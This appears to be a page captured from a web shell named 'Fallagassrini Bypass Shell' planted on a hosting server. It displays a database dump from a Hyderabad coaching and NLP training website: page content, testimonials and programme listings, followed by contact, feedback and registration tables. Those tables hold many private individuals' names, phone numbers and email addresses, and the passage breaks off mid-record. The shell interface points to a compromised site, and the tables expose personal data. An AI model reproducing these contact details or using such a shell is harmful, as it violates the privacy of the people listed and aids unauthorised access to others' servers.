? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/unova.in/test/application/data/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/unova.in/test/application/data/savoy_unova.sql

-- phpMyAdmin SQL Dump
-- version 3.4.9
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Mar 23, 2012 at 06:18 AM
-- Server version: 5.1.56
-- PHP Version: 5.2.9

SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;

--
-- Database: `savoy_unova`
--

-- --------------------------------------------------------

--
-- Table structure for table `coaching`
--

CREATE TABLE IF NOT EXISTS `coaching` (
  `coaching_id` int(11) NOT NULL AUTO_INCREMENT,
  `coaching_title` varchar(100) NOT NULL,
  `coaching_content` longtext NOT NULL,
  `coaching_contact` tinytext NOT NULL,
  `active` char(1) NOT NULL,
  `order` int(11) NOT NULL,
  PRIMARY KEY (`coaching_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=6 ;

--
-- Dumping data for table `coaching`
--

INSERT INTO `coaching` (`coaching_id`, `coaching_title`, `coaching_content`, `coaching_contact`, `active`, `order`) VALUES
(1, 'Individual', '                                                                 <p><strong>One on one private and confidential coaching</strong></p>\n<p> When I am working one on one with a client, it is my number one objective to help you reach your purpose, vision and goals by working through John Maxwell’s programs specific to your needs. Together, we will create a strategic plan that is a powerful way for you to gain clarity through a weekly process including interaction and accountability. </p>\n <ul>\n  <li> What are you doing to invest in yourself?</li>\n  <li>What are you doing to invest in others?</li>\n </ul>\n                                                                                                                                 ', 'For your individual Coaching', '1', 1),
(2, 'Group', '  <p><strong>Small setting onsite or via webinar and video technology</strong></p>\r\n<p>\r\nWhen I am working in a group setting, although it’s not singular in nature, having the entire group’s input in thinking magnifies the richness of the discussions and results in developing solutions that are above and beyond what any individual can create.  The cohesive bond that is formed empowers each person to develop the leader within and shine in a safe environment that nurtures the group as a whole. It is an experience unlike any other and follows the same premise as an academic think tank.</p>\r\n<p>"The goal of coaching is the goal of good management – to make the most of an organization’s valuable resources." - Harvard Business Review</p>\r\n<p>"Between 25% to 40% of Fortune 500 companies use executive coaches." - The HayGroup (USA) 1999</p>\r\n <p>"Leaders are more powerful role models when they learn than when they teach." - Rosabeth Moss Kanto, Harvard Business School</p>\r\n', 'For your group Coaching', '1', 2),
(3, 'Speaking/Workshops/Seminars', '                                  <p><strong>"Committing a great truth to memory is admirable; committing it to life is wisdom." </strong>William A. Ward</p>\r\n<p>As a Certified John Maxwell Coach, Trainer and Speaker, I offer customized presentations to fit your individual or team’s needs and budget such as:\r\n</p>\r\n    <ul>\r\n       <li>10 minute briefing<li>“Lunch and Learn”</li>\r\n       <li>Keynote speech for your company sponsored event</li>\r\n       <li>Half day and full day workshop/seminar</li>\r\n       <li>In-house corporate training</li>\r\n       <li>Executive and personal retreat</li>\r\n        <li>Partnership Summit</li>\r\n   </ul>\r\n<p>I will provide effective team communication and structure that is important for forging relationships equipping your team with the proper attitudes to develop leaders within.  We will work through goal setting and communication exercises that will bring cohesiveness to your group ultimately increasing productivity due to the positive influences each member will have on the group as a whole. </p>\r\n<p>In addition, I will at your request incorporate your organization’s meeting theme, mission/vision statement or build on your existing training schedule to best fit the needs of your group. </p>\r\n                                ', 'For your Speaking/Workshops/Seminars Coaching', '1', 3),
(4, 'Masterminding', ' <p>here is synergy of energy, commitment and excitement that participants bring to a mastermind group. My facilitated groups offer a combination of masterminding, peer brainstorming, education, accountability and support in a group setting to sharpen your business and personal skills. By bringing fresh ideas and a different perspective, my masterminds can help you achieve success.\r\n </p>\r\n <p>Key Benefits of a Mastermind Group:</p>\r\n  <ul>\r\n    <li>Increase your own experience and confidence</li>\r\n    <li>Sharpen your business and personal skills</li>\r\n    <li>Create real progress in your business and your life</li>\r\n    <li>Add an instant and valuable support network</li>\r\n    <li>Get honest feedback, advice and brainstorming</li>\r\n    <li>Borrow on the experience and skills of the other members</li>\r\n    <li>Study the 21 Irrefutable Laws of Leadership, create an action plan and have the group hold you accountable for fulfilling your plan and goals</li>\r\n    <li>Receive critical insights into yourself</li>\r\n    <li>Optimistic peer support in maintaining a positive mental attitude</li>\r\n    <li>A sense of shared endeavor – there are others out there!</li>\r\n  </ul>\r\n<p>"Hold yourself responsible for a higher standard than anybody else expects of you." Henry Ward Beecher</p>\r\n', 'For Mastermind Coaching', '1', 1);

-- --------------------------------------------------------

--
-- Table structure for table `coaching_registration`
--

CREATE TABLE IF NOT EXISTS `coaching_registration` (
  `coaching_reg_id` int(10) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) NOT NULL,
  `organization` varchar(200) NOT NULL,
  `contact_no` varchar(50) NOT NULL,
  `email` varchar(100) NOT NULL,
  `location` varchar(100) NOT NULL,
  `website` varchar(100) NOT NULL,
  `type` varchar(50) NOT NULL,
  `reference` varchar(200) NOT NULL,
  `datetime` datetime NOT NULL,
  `coaching_id` int(11) NOT NULL,
  PRIMARY KEY (`coaching_reg_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=5 ;

-- --------------------------------------------------------

--
-- Table structure for table `contact`
--

CREATE TABLE IF NOT EXISTS `contact` (
  `contact_id` int(10) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) NOT NULL,
  `organization` varchar(200) NOT NULL,
  `contact_no` varchar(50) NOT NULL,
  `email` varchar(100) NOT NULL,
  `website` varchar(100) NOT NULL,
  `type` varchar(50) NOT NULL,
  `reference` varchar(200) NOT NULL,
  `datetime` datetime NOT NULL,
  PRIMARY KEY (`contact_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=10 ;

--
-- Dumping data for table `contact`
--

INSERT INTO `contact` (`contact_id`, `name`, `organization`, `contact_no`, `email`, `website`, `type`, `reference`, `datetime`) VALUES
(4, 'SM', '', '0407702711120', 'sajansummers@gmail.com', '', 'Organization', 'Check', '2011-09-19 03:59:36'),
(5, 'SrikanthNimmala', 'Manpower', '9553704997', 'srikanth_nimmala@yahoo.com', '', 'Individual', 'website ', '2011-10-31 05:40:15'),
(6, 'NajeebSheikh', '', '09705857927', 'najeeb_sheikh@hotmail.com', '', 'Individual', 'Net Search', '2011-11-03 11:18:23'),
(7, 'jayasingh', 'plum innovation private limited', '08447900981', 'jaya.plum@yahoo.com', 'www.p-2.in', 'Individual', 'internet', '2011-11-11 04:32:12');

-- --------------------------------------------------------

--
-- Table structure for table `directory`
--

CREATE TABLE IF NOT EXISTS `directory` (
  `directory_id` int(11) NOT NULL AUTO_INCREMENT,
  `directory_name` varchar(200) NOT NULL,
  `directory_image` varchar(20) NOT NULL,
  PRIMARY KEY (`directory_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=9 ;

--
-- Dumping data for table `directory`
--

INSERT INTO `directory` (`directory_id`, `directory_name`, `directory_image`) VALUES
(1, 'Awesome Living', '7.png'),
(2, 'John Maxwell Training Florida', '6.png'),
(3, 'Training Pics', '5.png'),
(4, 'Outbound Training', '4.png'),
(6, 'Unova Certified NLP Diploma Sep 11', '3.png'),
(7, 'Excellence @ Work <br/> NLP 14-15 Dec 2011', '2.png'),
(8, 'Strategies for Life <br/> NLP 17-18 Dec 2011', '1.png');

-- --------------------------------------------------------

--
-- Table structure for table `feedback`
--

CREATE TABLE IF NOT EXISTS `feedback` (
  `contact_id` int(10) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) NOT NULL,
  `contact_no` varchar(50) NOT NULL,
  `email` varchar(100) NOT NULL,
  `subject` varchar(200) NOT NULL,
  `message` text NOT NULL,
  `datetime` datetime NOT NULL,
  PRIMARY KEY (`contact_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;

--
-- Dumping data for table `feedback`
--

INSERT INTO `feedback` (`contact_id`, `name`, `contact_no`, `email`, `subject`, `message`, `datetime`) VALUES
(5, 'oommenJacob', '', 'jackie157in@yahoo.co.in', 'congrats', 'Wish you all success. ', '2011-09-01 11:01:25'),
(6, 'AnilYadav', '', 'majanilyadav@gmail.com', 'Congrats!', 'congrats sir, looks like a great start. The site is very impressive.\nRegards, Anil.', '2011-11-25 01:14:16');

-- --------------------------------------------------------

--
-- Table structure for table `gallery`
--

CREATE TABLE IF NOT EXISTS `gallery` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `thumbnail` varchar(128) NOT NULL,
  `image` varchar(128) NOT NULL,
  `title` varchar(128) NOT NULL,
  `sort` int(11) NOT NULL,
  `directory_id` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=65 ;

--
-- Dumping data for table `gallery`
--

INSERT INTO `gallery` (`id`, `thumbnail`, `image`, `title`, `sort`, `directory_id`) VALUES
(8, '231.jpg', '231.jpg', 'Jessica with Ed De Costa- Renowned Business Coach and JMT Faculty', 13, 2),
(9, '221.jpg', '221.jpg', 'JMT Faculty', 14, 2),
(10, '211.jpg', '211.jpg', 'Jessica with John Maxwell- Worlds No 1 Leadership Coach', 15, 2),
(11, '191.jpg', '191.jpg', 'With John Maxwell Founders circle members', 16, 2),
(12, '181.jpg', '181.jpg', 'John Maxwell Training ', 17, 2),
(13, '161.jpg', '161.jpg', 'The John Maxwell team Training', 18, 2),
(14, '151.jpg', '151.jpg', 'With Paul Martinelli, President John Maxwell Training Company', 19, 2),
(15, '141.jpg', '141.jpg', 'At John Maxwell Training, Palm Beach Florida', 20, 2),
(16, '131.jpg', '131.jpg', 'John Maxwell Training, Florida ', 21, 2),
(17, '121.jpg', '121.jpg', 'With John Maxwell, Worlds No 1 Leadership Coach', 22, 2),
(18, '201.jpg', '201.jpg', 'John Maxwell Training Florida', 23, 2),
(19, '111.jpg', '111.jpg', 'NLP Training ', 24, 5),
(20, '101.jpg', '101.jpg', 'NLP with Yoga ', 25, 5),
(21, '91.jpg', '91.jpg', 'Communication Skills Training Programme', 26, 3),
(22, '81.jpg', '81.jpg', 'Neuro Linguistic Programming', 27, 5),
(23, '71.jpg', '71.jpg', 'Impression Management', 28, 3),
(24, '61.jpg', '61.jpg', 'Outbound Training', 29, 4),
(25, '51.jpg', '51.jpg', 'Outbound Training', 30, 4),
(26, '41.jpg', '41.jpg', 'Outbound Training', 31, 4),
(27, '31.jpg', '31.jpg', 'Outbound Training', 32, 4),
(28, '24.jpg', '24.jpg', 'Awesome Teens', 33, 1),
(29, '110.jpg', '110.jpg', 'Awesome Living Cochin', 34, 1),
(30, '171.jpg', '171.jpg', 'Speaker Training ,Florida', 23, 2),
(31, 'workshop_in_progress.JPG', 'workshop_in_progress.JPG', 'Workshop in Progress', 12, 6),
(32, 'UNOVA_Trainers.JPG', 'UNOVA_Trainers.JPG', 'UNOVA Trainers', 11, 6),
(33, 'During_the_break.JPG', 'During_the_break.JPG', 'During the break - NLP Training', 10, 6),
(34, 'Experiential_Learning.JPG', 'Experiential_Learning.JPG', 'Experiential Learning', 9, 6),
(35, 'NLP_Training.JPG', 'NLP_Training.JPG', 'NLP Training', 8, 6),
(36, 'NLP_Training_Hyderabad.JPG', 'NLP_Training_Hyderabad.JPG', 'NLP Training Hyderabad', 7, 6),
(37, 'NLP_at_Work.JPG', 'NLP_at_Work.JPG', 'NLP at Work', 6, 6),
(38, 'Team_UNOVA.JPG', 'Team_UNOVA.JPG', 'Team UNOVA', 5, 6),
(39, 'UNOVA_NLP.jpg', 'UNOVA_NLP.jpg', 'UNOVA NLP', 4, 6),
(40, 'UNOVA_NLP1_Diploma_program_24-25_Sep_11.JPG', 'UNOVA_NLP1_Diploma_program_24-25_Sep_11.JPG', 'UNOVA NLP1 Diploma program 24-25 Sep 11', 3, 6),
(41, 'UNOVA_NLP_Diploma_program_24-25_Sep_11.JPG', 'UNOVA_NLP_Diploma_program_24-25_Sep_11.JPG', 'UNOVA NLP Diploma program 24-25 Sep 11', 2, 6),
(42, 'UNOVA_team.JPG', 'UNOVA_team.JPG', 'UNOVA team', 1, 6),
(43, '701.jpg', '701.jpg', '14-15 Dec 2011 NLP for Organizations', 1, 7),
(44, '702.jpg', '702.jpg', '14-15 Dec 2011 NLP for Organizations', 2, 7),
(45, '703.jpg', '703.jpg', '14-15 Dec 2011 NLP for Organizations', 3, 7),
(46, '704.jpg', '704.jpg', '14-15 Dec 2011 NLP for Organizations', 4, 7),
(47, '705.jpg', '705.jpg', '14-15 Dec 2011 NLP for Organizations', 5, 7),
(48, '706.jpg', '706.jpg', '14-15 Dec 2011 NLP for Organizations', 6, 7),
(49, '707.jpg', '707.jpg', '14-15 Dec 2011 NLP for Organizations', 7, 7),
(50, '708.jpg', '708.jpg', '14-15 Dec 2011 NLP for Organizations', 9, 7),
(51, '709.jpg', '709.jpg', '14-15 Dec 2011 NLP for Organizations', 10, 7),
(52, '710.jpg', '710.jpg', '14-15 Dec 2011 NLP for Organizations', 11, 7),
(53, '711.jpg', '711.jpg', '14-15 Dec 2011 NLP for Organizations', 12, 7),
(55, '921.jpg', '921.jpg', 'Strategies for Life- NLP 17-18 Dec 2011', 1, 8),
(56, '922.jpg', '922.jpg', 'Strategies for Life- NLP 17-18 Dec 2011', 2, 8),
(58, '924.jpg', '924.jpg', 'Strategies for Life- NLP 17-18 Dec 2011', 4, 8),
(59, '925.jpg', '925.jpg', 'Strategies for Life- NLP 17-18 Dec 2011', 5, 8),
(60, '926.jpg', '926.jpg', 'Strategies for Life- NLP 17-18 Dec 2011', 6, 8),
(61, '927.jpg', '927.jpg', 'Strategies for Life- NLP 17-18 Dec 2011', 7, 8),
(62, '928.jpg', '928.jpg', 'Strategies for Life- NLP 17-18 Dec 2011', 8, 8),
(64, '930.jpg', '930.jpg', 'Strategies for Life- NLP 17-18 Dec 2011', 10, 8);

-- --------------------------------------------------------

--
-- Table structure for table `programme`
--

CREATE TABLE IF NOT EXISTS `programme` (
  `programme_id` int(10) NOT NULL AUTO_INCREMENT,
  `programme_title` varchar(200) NOT NULL,
  `prgmdate` varchar(20) NOT NULL,
  `active` int(2) NOT NULL,
  `order` int(2) NOT NULL,
  `second_line` varchar(200) NOT NULL,
  `third_line` varchar(200) NOT NULL,
  `fourth_line` varchar(200) NOT NULL,
  `description` text NOT NULL,
  PRIMARY KEY (`programme_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=10 ;

--
-- Dumping data for table `programme`
--

INSERT INTO `programme` (`programme_id`, `programme_title`, `prgmdate`, `active`, `order`, `second_line`, `third_line`, `fourth_line`, `description`) VALUES
(4, '14-15 Dec 2011 Certified NLP Diploma Program (Two Day - Non Residential)', '14-15 Dec 2011', 2, 3, 'For <b>Organisations </b>', '<b>Venue</b> - Hotel Skyway Banjara, Banjara Hills, Hyderabad', 'Cost - Rs.7,500/- (Non-Residential basis)', 'With International Master Trainer Ashok Subramanian and Shinota Consulting'),
(3, '07-08 Jul 2012 Certified NLP Diploma Program (Two Day - Weekend Non Residential)', '07-08 Jul 2012', 1, 3, 'For <b>Managers, Executives, Professionals, Students and Home Makers</b>', '<b>Venue </b>- The Marriott, Hyderabad', 'Cost - Rs.7,500/- (Non-Residential basis)', 'With International Master Trainer Ashok Subramanian and Shinota Consulting'),
(5, '07-08 April 2012 Certified NLP Diploma Program (Two Day - Weekend Non Residential)', '07-08 April 2012', 1, 2, 'For <b>Managers, Executives, Professionals, Students and Home Makers</b>', '<b>Venue</b> -The Mariott, Hyderabad', 'Cost - Rs.7,500/- (Non-Residential basis)', 'With International Master Trainer Ashok Subramanian and Shinota Consulting'),
(7, '17-18 Dec 2011 Certified NLP Diploma Program (Two Day - Weekend Non Residential)', '17-18 Dec 2011', 2, 2, 'For <b>Managers, Executives, Professionals, Students and Home Makers</b>', '<b>Venue </b>- Hotel Skyway Banjara, Banjara Hills, Hyderabad', 'Cost - Rs.7,500/- (Non-Residential basis)', 'With International Master Trainer Ashok Subramanian and Shinota Consulting'),
(6, '13-14 Oct 2012 NLP Diploma Program (Two Day - Weekend)', '13-14 Oct 2012', 1, 4, 'For <b>Managers, Executives, Professionals, Students and Home Makers</b>', '<b>Venue </b>- The Marriott, Hyderabad', 'Cost - Rs.7,500/- (Non-Residential basis)', 'With International Master Trainer Ashok Subramanian and Shinota Consulting'),
(8, '24-25 Sep 2011 NLP Diploma Program (Two Day - Weekend)', '24-25 Sep 2011', 2, 4, '(In association with Shinota Consulting)', 'Venue - Hotel Skyway Banjara, Banjra Hills, Hyderabad', 'Cost - Rs.7,500/- (Non-Residential basis)', ''),
(9, '04-05 April 2012 <b> "Excellence @ Work" </b> Certified NLP Diploma Program (Two Day - Non Residential)', '04-05 April 2012', 1, 1, 'Two Day NLP Program for <b>Organisations </b>', '<b> Venue </b> Ebony Boutique Hotel, Road No 2, Banjara Hills, Hyderabad', '', 'With International Master Trainer Ashok Subramanian and Shinota Consulting');

-- --------------------------------------------------------

--
-- Table structure for table `programme_registration`
--

CREATE TABLE IF NOT EXISTS `programme_registration` (
  `programme_reg_id` int(10) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) NOT NULL,
  `organization` varchar(200) NOT NULL,
  `contact_no` varchar(50) NOT NULL,
  `email` varchar(100) NOT NULL,
  `location` varchar(100) NOT NULL,
  `website` varchar(100) NOT NULL,
  `type` varchar(50) NOT NULL,
  `reference` varchar(200) NOT NULL,
  `datetime` datetime NOT NULL,
  `programme_id` int(11) NOT NULL,
  PRIMARY KEY (`programme_reg_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=26 ;

--
-- Dumping data for table `programme_registration`
--

INSERT INTO `programme_registration` (`programme_reg_id`, `name`, `organization`, `contact_no`, `email`, `location`, `website`, `type`, `reference`, `datetime`, `programme_id`) VALUES
(3, 'shansalam', 'ddsads', '424253534', 'sales@sds.com', '', 'dfsfds', 'Organization', 'indi', '2011-08-27 13:33:31', 3),
(4, 'VIJAY KUMARJANGALA', 'Dept of Atomic Energy', '0409492486048', 'jvkumar5953@gmail.com', '', '', 'Individual', 'from SV University, Tirupati, A.P.', '2011-09-02 09:29:16', 4),
(5, 'ShaikAkber', 'Interior designing', '+919441912606', 'shaik_akber2000@yahoo.co.in', '', '', 'Individual', 'banner', '2011-09-20 10:52:05', 4),
(6, 'vijayvankineni', 'student', 'o8702337789', 'vijay.vankineni@gmail.com', '', 'www.gmail.com', 'Organization', 'hi', '2011-09-21 00:14:35', 5),
(7, 'HobbyMenon', 'Morpheus Archetypes', '09049046141', 'hobby.menon@gmail.com', '', '-', 'Individual', 'search engine', '2011-09-23 23:34:37', 3),
(8, 'TamilarasanPalani', 'ADP Pvt Ltd.', '09553847841', 'tamilarasan1p@gmail.com', '', '', 'Individual', 'web', '2011-09-30 22:29:16', 3),
(9, 'dhavalpatil', 'individual', '02322225616', 'patildhaval33@yahoo.com', '', '', 'Individual', 'net', '2011-10-10 11:49:43', 5),
(10, 'Shwethajadav', 'Independent Consultant', '09900508839', 'shwethajadav@gmail.com', '', '', 'Individual', 'Reference', '2011-10-11 01:27:04', 3),
(11, 'MDAMEENUDDIN', '', '09550557212', 'ameen.md10@yahoo.com', '', '', 'Individual', 'Internet', '2011-10-14 12:49:49', 3),
(12, 'MDAMEENUDDIN', '', '09550557212', 'ameen.md10@yahoo.com', '', '', 'Individual', 'Internet', '2011-10-14 12:51:10', 3),
(13, 'AnanthKumar', '', '09701600714', 'iamananth@hotmail.com', '', '', 'Individual', 'news paper', '2011-10-25 04:29:44', 4),
(15, 'xxxx', 'yy', '4011223344', 'sajansummers@gmail.com', 'Hyd', 'test', 'Individual', 'test', '2011-11-05 11:57:19', 4),
(16, 'Mamathakanda', '', '+917207825531', 'kmamatharao@gmail.com', '', '', 'Individual', '', '2011-11-11 00:05:43', 3),
(17, 'nityakonda', '', '919949269674', 'nithya.madhu19@hotmail.com', 'hyderabad', '', 'Individual', 'internet', '2011-11-14 02:46:35', 3),
(18, 'LillianJohnson', 'Trainer', '0919959048545', 'liljohn109@hotmail.com', 'hyderabad', 'na', 'Individual', 'on line', '2011-11-18 07:25:35', 4),
(19, 'SarmaTiruvalluri', 'Proton Informatics', '0409703300300', 'tvssarma@gmail.com', 'Hyderabad', '', 'Individual', 'Facebook', '2012-01-11 06:12:23', 5),
(20, 'bandipurushotham', 'ntv hyderabad', '919010234232', 'bandi_purushotham@yahoo.com', 'hyderabad', '', 'Individual', 'net', '2012-01-17 11:33:21', 5),
(21, 'MohammedAbdul Subhan', 'Business', '', 'mohammed_abdulsubhan@yahoo.com', 'Kadiri, ATP dist, AP', '', 'Individual', 'web search', '2012-01-28 01:59:51', 3),
(22, 'narsimha swami', 'student', '9959961462', 'narsimha329@gmail.com', 'hyderabad', 'no', 'Organization', 'online', '2012-02-23 23:12:21', 5),
(23, 'SaaJaan', '', '917702711120', 'sajansummers@gmail.com', 'Hyd', '', 'Individual', 'Face', '2012-03-05 08:37:23', 5),
(24, 'SajanMM', '', '04024343366', 'sajansummers@gmail.com', 'Hyd', 'Test 2', 'Individual', 'Test 2', '2012-03-19 03:24:58', 5),
(25, 'AshokSubramanian', 'Shinota Consulting', '4842367555', 'ash777ok@gmail.com', 'Ernakulam', '', 'Organization', 'test mail', '2012-03-21 10:54:33', 5);

-- --------------------------------------------------------

--
-- Table structure for table `quote`
--

CREATE TABLE IF NOT EXISTS `quote` (
  `quote_id` int(11) NOT NULL AUTO_INCREMENT,
  `quote_content` text NOT NULL,
  PRIMARY KEY (`quote_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=3 ;

--
-- Dumping data for table `quote`
--

INSERT INTO `quote` (`quote_id`, `quote_content`) VALUES
(1, '"As a leader, you should always challenge people to move out of their comfort zone, but never out of their strength zone"- John Maxwell\n\n');

-- --------------------------------------------------------

--
-- Table structure for table `reminder`
--

CREATE TABLE IF NOT EXISTS `reminder` (
  `reminder_id` int(11) NOT NULL AUTO_INCREMENT,
  `content` text NOT NULL,
  PRIMARY KEY (`reminder_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=3 ;

-- --------------------------------------------------------

--
-- Table structure for table `testimonial`
--

CREATE TABLE IF NOT EXISTS `testimonial` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `person` varchar(100) NOT NULL,
  `designation` varchar(100) NOT NULL,
  `testimonial` longtext NOT NULL,
  `sort` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=20 ;

--
-- Dumping data for table `testimonial`
--

INSERT INTO `testimonial` (`id`, `person`, `designation`, `testimonial`, `sort`) VALUES
(5, 'Kedar Bartake', 'Manager HR SofTech, Pune', '                                 <meta http-equiv="content-type" content="text/html; charset=utf-8"><span class="Apple-style-span" style="color: rgb(79, 79, 79); font-family: Verdana, Verdana, Geneva, sans-serif; font-size: 12px; line-height: 18px; ">"Jessica comes across as an earnest and dedicated trainer. She is passionate about her work and areas of expertise. She is professional in her overall delivery and ensures that she communicates effectively. Basically a warm and genuine person, she is approachable and connects with her audience easily. She is a really committed trainer . We have benefited a lot from her program. Her training sessions were exactly what we were looking for our upper management to undergo. The sessions were found to be precise and addressed the core issues to a great extent.. I would highly recommend her programs."</span>                                ', 8),
(6, 'Bharat Togarrathi', 'Business Development Manager, Gallop Technologies, Hyderabad', '                                                                  <meta http-equiv="content-type" content="text/html; charset=utf-8"><span class="Apple-style-span" style="color: rgb(0, 103, 185); font-family: Verdana, Verdana, Geneva, sans-serif; font-size: 12px; line-height: 18px; "><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">"I have become more aware about my thinking patterns. I’m Observing people, their behavior, noticing lot of people who think their map is other’s territory, finding lot of examples on deletions, generalizations and distortions in communication. Trying to see excellence around and model some of it.</p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">Ashok''s training style is Very Informal and very interesting. He Connects easily with people and laughs like a child which I liked the most.</p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">I''m glad to be a part of the training. Would like to improve on NLP from here and would seek some support from you as and when needed.I definitely want to learn NLP more as I find it useful in everyday life."<br></p></span>                                                                ', 9),
(7, 'Amruta B', 'College Student, Pune', '                                                                  <meta http-equiv="content-type" content="text/html; charset=utf-8"><span class="Apple-style-span" style="color: rgb(0, 103, 185); font-family: Verdana, Verdana, Geneva, sans-serif; font-size: 12px; line-height: 18px; "><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">"I thought of Ashok''s training style to be very free flowing and cleverly adaptive to the needs of our group. It was a surprisingly refreshing experience with a beautiful blend of concepts and their application in our individual lives. It has made me more aware in a lot of areas. I felt very inspired and loaded with positive energy. It gave me a strong boost to make some alterations in my daily life. My conversion with Ashok has also given me another perspective in important areas of my life in turn helping me make better choices. A practitioner workshop will definitely be the next step as and when it''s possible for me.</p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">I had a brilliant experience and look forward to having many more such experiences."</p></span>                                                                ', 11),
(15, 'Subramanian Narayan', 'Senior Finance Executive, Dow Chemical, Singapore, Certified John Maxwell Speaker, Trainer and Coach', '                                 <div>"Thank you for an excellent two day NLP Training. The combination of \ndiscussions, demonstrations and small group practice was very effective in \ncreating the right skill, understanding and personal growth. I also found Ashok \nSubramanian to be an insightful teacher who helped me to see my blind-spots and \nacquire new skills that i believe are critical for success in anyone''s \ncareer.”<br></div>                                ', 1),
(9, 'T Ram Venkatraman', 'President, Scope eKnowledge Center', '                                                                  <meta http-equiv="content-type" content="text/html; charset=utf-8"><span class="Apple-style-span" style="color: rgb(0, 103, 185); font-family: Verdana, Verdana, Geneva, sans-serif; font-size: 12px; line-height: 18px; "><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">Dr.Jessina''s qualification, experience and credibility as a trainer were impressive and she exactly understood our organizational needs and put together an interactive, informative and action-packed two-day workshop aimed at creating and delivering crisp and focused presentations effectively and emphatically.</p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">The tips she shared with our staff on pre-presentation preparation, tone, body language, delivery and audience engagement prove invaluable for a knowledge service organization like ours, which needs to communicate strong positioning and effective brand messages in short time to clients.</p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">Dr. Jessina''s pleasant personality, simple ways, passion and involvement in training has helped our staff enhance their ability to articulate and deliver powerful presentations with confidence and poise.</p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">We are extremely satisfied with her work with Scope eKnowledge.</p></span>                                                                ', 10),
(10, 'Xavier Gregory', ' Asst. General Manager, Federal Bank, Zonal Office Calicut', '                                                                  <meta http-equiv="content-type" content="text/html; charset=utf-8"><span class="Apple-style-span" style="color: rgb(0, 103, 185); font-family: Verdana, Verdana, Geneva, sans-serif; font-size: 12px; line-height: 18px; "><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">The one month Executive Coaching which I had under Dr. Jessina''s guidance was very effective and useful for my career and personal growth. I could update my skills on communication effectiveness, business etiquettes, presentations skills and the like.</p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">Thank you for all the support and guidance.</p><p style="margin-top: 0px; margin-right: 0px; 